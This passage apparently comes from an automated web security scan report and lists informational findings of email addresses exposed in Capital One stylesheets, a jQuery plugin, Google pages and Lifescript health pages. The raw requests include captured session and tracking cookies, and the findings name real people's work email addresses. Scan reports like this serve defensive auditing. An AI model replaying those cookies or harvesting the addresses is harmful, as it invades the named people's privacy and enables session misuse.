Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; BIGipServerpl_capitalone.com_80=745088266.29215.0000; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; smartTracking=; decipherinc_seen_popup=set; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:32:07 GMT
Server: Apache
Last-Modified: Fri, 13 May 2011 13:40:43 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:32:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 9786
Content-Type: text/css

/*-----------------------------------------------------------------------------
Capital One Print Style Sheet
version: 1.0
author: James Steincamp
e-mail: james.steincamp@capitalone.com
-----------------------------------------------------------------------------*/

/* =Reset
-----------------------------------------------------------------------------*/
body {
background: #ff
...[SNIP]...

22.42. http://www.capitalone.com/css/header.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/header.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/header.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; BIGipServerpl_capitalone.com_80=745088266.29215.0000; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; smartTracking=; decipherinc_seen_popup=set; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:31:50 GMT
Server: Apache
Last-Modified: Tue, 27 Jul 2010 11:22:03 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:31:50 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 15991
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Header Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Header
----------------------------------------------------------------------------------------------------*/

...[SNIP]...

22.43. http://www.capitalone.com/css/page-nav-heading.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-nav-heading.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/page-nav-heading.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; BIGipServerpl_capitalone.com_80=745088266.29215.0000; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; smartTracking=; decipherinc_seen_popup=set; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:31:50 GMT
Server: Apache
Last-Modified: Tue, 20 Oct 2009 20:24:22 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:31:50 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 4843
Content-Type: text/css

/*-----------------------------------------------------------------------------
Page Breadcrumb, Heading, and Secondary Navigation Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Breadcrumb
----------------------------------------------------------------------------------------------------
...[SNIP]...

22.44. http://www.capitalone.com/scripts/https-common/jquery/tooltip/bgiframe.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/scripts/https-common/jquery/tooltip/bgiframe.js

Issue detail

The following email address was disclosed in the response:

brandon.aaron@gmail.com

Request

GET /scripts/https-common/jquery/tooltip/bgiframe.js HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/autoloans/index.php?linkid=WWW_1009_Z_A2084B1F86C22A0D1FFBE38F9F1F85G5AF4H7CC8_HOME_C5_04_T_AC1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; BIGipServerpl_capitalone.com_80=745088266.29215.0000

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:28:42 GMT
Server: Apache
Last-Modified: Tue, 26 Feb 2008 15:48:13 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:28:42 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5044
Content-Type: application/x-javascript

/* Copyright (c) 2006 Brandon Aaron (http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-li
...[SNIP]...
ided so that one could change
*        the src of the iframe to whatever they need.
*        Default: "javascript:false;"
*
* @name bgiframe
* @type jQuery
* @cat Plugins/bgiframe
* @author Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
*/
$.fn.bgIframe = $.fn.bgiframe = function(s) {
   // This is only for IE6
   if ( $.browser.msie && parseInt($.browser.version) <= 6 ) {
       s = $.extend({
           top : 'auto'
...[SNIP]...

22.45. https://www.capitalone.com/css/footer.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.capitalone.com
Path:	/css/footer.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/footer.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:27:48 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 14:09:08 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:27:48 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1720
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Footer Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Global Footer
-------------------------------------------------------------------------------------------------
...[SNIP]...

22.46. https://www.capitalone.com/css/framework/base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.capitalone.com
Path:	/css/framework/base.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/framework/base.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:27:55 GMT
Server: Apache
Last-Modified: Wed, 03 Nov 2010 13:58:09 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:27:55 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 4924
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Reset
----------------------------------------------------------------------------------------------------*/
b
...[SNIP]...

22.47. https://www.capitalone.com/css/framework/grid.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.capitalone.com
Path:	/css/framework/grid.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/framework/grid.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:27:47 GMT
Server: Apache
Last-Modified: Fri, 06 Aug 2010 16:24:05 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:27:47 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 9434
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Grid Style Sheet - Based on 960.gs
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Grid Containers - 960 Grid System
-----------------------------------------------------------------------------
...[SNIP]...

22.48. https://www.capitalone.com/css/framework/print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.capitalone.com
Path:	/css/framework/print.css

Issue detail

The following email address was disclosed in the response:

james.steincamp@capitalone.com

Request

GET /css/framework/print.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; smartTracking=

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:28:18 GMT
Server: Apache
Last-Modified: Fri, 13 May 2011 13:40:43 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:28:18 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 9786
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css

/*-----------------------------------------------------------------------------
Capital One Print Style Sheet
version: 1.0
author: James Steincamp
e-mail: james.steincamp@capitalone.com
-----------------------------------------------------------------------------*/

/* =Reset
-----------------------------------------------------------------------------*/
body {
background: #ff
...[SNIP]...

22.49. https://www.capitalone.com/css/header.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.capitalone.com
Path:	/css/header.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/header.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:27:48 GMT
Server: Apache
Last-Modified: Tue, 27 Jul 2010 11:22:03 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:27:48 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 15991
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Header Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Header
----------------------------------------------------------------------------------------------------*/

...[SNIP]...

22.50. https://www.capitalone.com/css/page-nav-heading.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.capitalone.com
Path:	/css/page-nav-heading.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/page-nav-heading.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:27:48 GMT
Server: Apache
Last-Modified: Tue, 20 Oct 2009 20:24:22 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:27:48 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 4843
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css

/*-----------------------------------------------------------------------------
Page Breadcrumb, Heading, and Secondary Navigation Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Breadcrumb
----------------------------------------------------------------------------------------------------
...[SNIP]...

22.51. https://www.capitalone.com/css/page-type/homepage.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.capitalone.com
Path:	/css/page-type/homepage.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/page-type/homepage.css HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:27:48 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 14:37:09 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:27:48 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 10884
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/css

/*-----------------------------------------------------------------------------
Capital One Home Page Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

.homepage h2 {
font-size: 1.3em;
margin: 0;
}
.homepage h3 {
font-size: 1.25em;
margin: 0;
}
...[SNIP]...

22.52. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The following email address was disclosed in the response:

jplatt@microsoft.com

Request

GET /search?sclient=psy&hl=en&source=hp&q=%22.research.microsoft.com%22&pbx=1&oq=%22.research.microsoft.com%22&aq=f&aqi=g-l5&aql=&gs_sm=e&gs_upl=4811l6219l2l6429l2l1l0l0l0l0l682l682l5-1l1&bav=on.2,or.r_gc.r_pw.&fp=cae8a5964b14564c&biw=948&bih=802&tch=1&ech=1&psi=CyoqTtz7JOWr0AGppfHSCg.1311386163926.3 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Microsoft+Research
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=W8r0AKxd5wk5CX1jyfDbNGqu0gNP9tvrFwquFIFVcdigP0YfOxWLbqIT-uh0HQif4kRtxM0Zmnl6hxXO7elxBhi5M5Shuv0bLm6MSaba7TZWWydFwvwYYpn2fEzjfe3s

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 01:56:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: application/json; charset=UTF-8
Content-Disposition: attachment
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 74587

BfyINKgQ....S.......&.
.........D..v{e:"PSoqTsX7Iajj0QH5sZnnCg",c:1,u:"http://www.google.com/search?sclient\x3dpsy\x26hl\x3den\x26source\x3dhp\x26q\x3d%22.research.microsoft.com%22\x26pbx\x3d1\x26oq\x
...[SNIP]...
x22\\x3eRelated articles\\x3c/a\\x3e\\x3cbr\\x3e\\x3cspan class\\x3dst\\x3e1. Sequential Minimal Optimization: A Fast Algorithm for Training Support Vector Machines. John C. Platt. Microsoft Research jplatt@microsoft.com \\x3cb\\x3e...\\x3c/b\\x3e\\x3cbr\\x3e\\x3c/span\\x3e\\x3c/div\\x3e\\x3c/div\\x3e\\x3c!--n--\\x3e\\x3cli class\\x3dg\\x3e\\x3ch3 class\\x3dr\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;biw\\x3d
...[SNIP]...

22.53. https://www.google.com/accounts/ServiceLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.google.com
Path:	/accounts/ServiceLogin

Issue detail

The following email address was disclosed in the response:

pat@example.com

Request

Response

HTTP/1.1 200 OK
Set-Cookie: GoogleAccountsLocale_session=en; Secure
Set-Cookie: GAPS=1:8NHfoLp0YL1PxDKI4Z_HYTEUeiRmdA:nkPoqz6qT-62E4vt;Path=/accounts;Expires=Sat, 20-Jul-2013 19:04:38 GMT;Secure;HttpOnly
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Frame-Options: Deny
X-Auto-Login: realm=com.google&args=service%3Dmail%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fmail%252F%253Fhl%253Den%2526tab%253Dwm%2526ui%253Dhtml%2526zy%253Dl
Date: Thu, 21 Jul 2011 19:04:38 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 27775
Server: GSE

<html lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="7+ GB of storage, less spam, and mobile access. Gmail is email
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

22.54. http://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifescript.com
Path:	/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx

Issue detail

The following email addresses were disclosed in the response:

anonymous-disqus@lifescript.com
community@lifescript.com

Request

Response

22.55. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifescript.com
Path:	/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx

Issue detail

The following email addresses were disclosed in the response:

anonymous-disqus@lifescript.com
community@lifescript.com

Request

Response

22.56. http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifescript.com
Path:	/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx

Issue detail

The following email addresses were disclosed in the response:

